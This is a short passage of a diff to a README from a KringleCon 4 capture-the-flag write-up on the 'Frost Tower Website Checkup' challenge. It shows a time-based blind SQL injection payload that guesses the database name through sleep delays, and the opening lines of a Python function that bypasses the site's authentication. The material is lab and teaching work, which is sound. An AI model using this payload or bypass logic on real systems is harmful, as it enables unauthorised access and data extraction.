LamonatoAndrea/KringleCon4/12. Frost Tower Website Checkup/README.md

 1,(SELECT CASE WHEN ((SELECT LOWER(HEX(database()))) LIKE '656%') THEN (sleep(0.1)) ELSE 2 END) Query took 32 seconds
 ```

-With 32 seconds of response time for every successful query ended up in the session being invalidated so I added a logic to programmatically bypass the authentication in case of issue:
+With 32 seconds of response time for every successful query, it ended up in the session being invalidated so I added a logic to programmatically bypass the authentication in case of issue:
 ```python
 def bypassAuth ():
     dashboard_get_url = "https://staging.jackfrosttower.com/dashboard"